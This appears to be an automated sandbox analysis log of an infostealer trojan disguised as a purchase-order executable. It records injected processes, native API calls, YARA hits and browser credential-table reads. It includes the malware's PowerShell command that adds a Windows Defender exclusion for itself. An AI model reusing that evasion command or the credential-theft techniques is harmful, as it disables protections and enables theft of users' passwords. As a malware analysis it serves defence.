                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008384000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008060000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007BAA000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.00000000060D4000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005DB0000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.00000000058FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

                E-Banking Fraud

                Source: Yara match, File source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2F00 NtCreateFile,4_2_013F2F00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2FB0 NtSetValueKey,4_2_013F2FB0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2E00 NtQueueApcThread,4_2_013F2E00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2E50 NtCreateSection,4_2_013F2E50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2E80 NtCreateProcessEx,4_2_013F2E80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2ED0 NtResumeThread,4_2_013F2ED0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2EC0 NtQuerySection,4_2_013F2EC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F38D0 NtGetContextThread,4_2_013F38D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F3C30 NtOpenProcessToken,4_2_013F3C30
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F3C90 NtOpenThread,4_2_013F3C90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02CF0 NtDelayExecution,LdrInitializeThunk,13_2_04A02CF0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C30 NtMapViewOfSection,LdrInitializeThunk,13_2_04A02C30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02D10 NtQuerySystemInformation,LdrInitializeThunk,13_2_04A02D10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02E50 NtCreateSection,LdrInitializeThunk,13_2_04A02E50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02F00 NtCreateFile,LdrInitializeThunk,13_2_04A02F00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A029F0 NtReadFile,LdrInitializeThunk,13_2_04A029F0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02A80 NtClose,LdrInitializeThunk,13_2_04A02A80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02AC0 NtEnumerateValueKey,LdrInitializeThunk,13_2_04A02AC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02A10 NtWriteFile,LdrInitializeThunk,13_2_04A02A10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B80 NtCreateKey,LdrInitializeThunk,13_2_04A02B80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B90 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04A02B90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02BC0 NtQueryInformationToken,LdrInitializeThunk,13_2_04A02BC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B00 NtQueryValueKey,LdrInitializeThunk,13_2_04A02B00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B10 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04A02B10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A034E0 NtCreateMutant,LdrInitializeThunk,13_2_04A034E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A04570 NtSuspendThread,13_2_04A04570
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A04260 NtSetContextThread,13_2_04A04260
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02CD0 NtEnumerateKey,13_2_04A02CD0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C20 NtSetInformationFile,13_2_04A02C20
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C10 NtOpenProcess,13_2_04A02C10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C50 NtUnmapViewOfSection,13_2_04A02C50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02DA0 NtReadVirtualMemory,13_2_04A02DA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02DC0 NtAdjustPrivilegesToken,13_2_04A02DC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02D50 NtWriteVirtualMemory,13_2_04A02D50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02EB0 NtProtectVirtualMemory,13_2_04A02EB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02E80 NtCreateProcessEx,13_2_04A02E80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02EC0 NtQuerySection,13_2_04A02EC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02ED0 NtResumeThread,13_2_04A02ED0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02E00 NtQueueApcThread,13_2_04A02E00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02FB0 NtSetValueKey,13_2_04A02FB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02F30 NtOpenDirectoryObject,13_2_04A02F30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A029D0 NtWaitForSingleObject,13_2_04A029D0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02AA0 NtQueryInformationFile,13_2_04A02AA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02BE0 NtQueryVirtualMemory,13_2_04A02BE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B20 NtQueryInformationProcess,13_2_04A02B20
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A03C90 NtOpenThread,13_2_04A03C90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A03C30 NtOpenProcessToken,13_2_04A03C30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A038D0 NtGetContextThread,13_2_04A038D0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEEDD6 NtQueryInformationProcess,NtReadVirtualMemory,13_2_04CEEDD6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF46E8 NtUnmapViewOfSection,13_2_04CF46E8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3618 NtSuspendThread,13_2_04CF3618
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3308 NtSetContextThread,13_2_04CF3308
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF431D NtMapViewOfSection,13_2_04CF431D
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3C38 NtQueueApcThread,13_2_04CF3C38
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEEDD8 NtQueryInformationProcess,13_2_04CEEDD8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEF903 NtResumeThread,13_2_04CEF903
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3928 NtResumeThread,13_2_04CF3928
                Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8F87213_2_04A8F872
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D987013_2_049D9870
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EB87013_2_049EB870
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A159C013_2_04A159C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8FA8913_2_04A8FA89
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EFAA013_2_049EFAA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A61B8013_2_04A61B80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8FB2E13_2_04A8FB2E
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A0DB1913_2_04A0DB19
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEEDD613_2_04CEEDD6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEE5AC13_2_04CEE5AC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CED67813_2_04CED678
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEE0F813_2_04CEE0F8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF50AC13_2_04CF50AC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEE21313_2_04CEE213
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DEA0F814_2_0000020832DEA0F8
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DEA5AC14_2_0000020832DEA5AC
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DE967814_2_0000020832DE9678
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DEA21314_2_0000020832DEA213
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 01407BE4 appears 102 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 0143EF10 appears 105 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 013AB910 appears 278 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 0142E692 appears 86 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 013F5050 appears 58 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A05050 appears 58 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 049BB910 appears 274 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A3E692 appears 86 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A4EF10 appears 105 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A17BE4 appears 101 times
                Source: PO 1202495088.exe, 00000001.00000002.1117480110.0000000006EEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1114762319.00000000042F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1121146600.000000006FD8B000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1116911206.0000000005960000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp Binary or memory string: lastOriginalFileName vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000000.959119660.0000000000DF4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameOwbg.exe, vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1112653451.000000000150E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1118211923.0000000009C00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000004.00000002.1464816482.00000000014AD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCTTUNE.EXEj% vs PO 1202495088.exe
                Source: PO 1202495088.exe Binary or memory string: OriginalFilenameOwbg.exe, vs PO 1202495088.exe
                Source: PO 1202495088.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 1202495088.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: _0020.SetAccessControl
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: _0020.AddAccessRule
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, uUjTuaEUHvFULjn8cB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: _0020.SetAccessControl
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: _0020.AddAccessRule
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: _0020.SetAccessControl
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.cs Security API names: _0020.AddAccessRule
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, uUjTuaEUHvFULjn8cB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, uUjTuaEUHvFULjn8cB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/9@18/13
                Source: C:\Users\user\Desktop\PO 1202495088.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 1202495088.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:304:WilStaging_02
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whnjezoi.djl.ps1
                Source: PO 1202495088.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PO 1202495088.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\PO 1202495088.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: cttune.exe, 0000000D.00000002.5169500808.0000000007C33000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8C000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169500808.0000000007C97000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: PO 1202495088.exe ReversingLabs: Detection: 50%
                Source: unknown Process created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PO 1202495088.exe Process created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
                Source: C:\Windows\SysWOW64\cttune.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, edgegdi.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, gpapi.dll, iconcodecservice.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, edgegdi.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, urlmon.dll, xmllite.dll, iertutil.dll, srvcli.dll, netutils.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, wininet.dll
                Source: C:\Users\user\Desktop\PO 1202495088.exe Section loaded: edgegdi.dll
                Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll, edgegdi.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, wkscli.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
